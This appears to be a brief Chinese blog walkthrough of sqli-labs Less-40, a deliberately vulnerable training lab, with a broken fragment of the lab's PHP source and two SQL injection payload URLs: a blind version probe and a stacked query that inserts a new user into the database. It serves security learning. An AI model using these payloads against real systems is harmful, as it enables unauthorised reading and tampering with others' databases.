sqli-Labs————less-40

Less-40

sqli-Labs————less-40_第1张图片

查看源代码:






Less-40 **stacked Query String type Blind**



Welcome    Dhakkan
'; printf("Your Username is : %s", $row[1]); echo "
"; printf("Your Password is : %s", $row[2]); echo "
"; echo "
"; } // mysqli_free_result($result); } /* print divider */ if (mysqli_more_results($con1)) { //printf("-----------------\n"); } //while (mysqli_next_result($con1)); } /* close connection */ mysqli_close($con1); } else { echo "Please input the ID as parameter with numeric value";} ?>



根据SQL语句我们直接给出以下payload:

sqli-Labs————less-40_第2张图片

http://192.168.11.136/sqli-labs/Less-40?id=-1')or left(version(),1)=5 --+

sqli-Labs————less-40_第3张图片

堆叠注入:

http://192.168.11.136/sqli-labs/Less-40?id=1');insert into users(id,username,password) values ('101','hps','111')#

sqli-Labs————less-40_第4张图片

sqli-Labs————less-40_第5张图片



你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)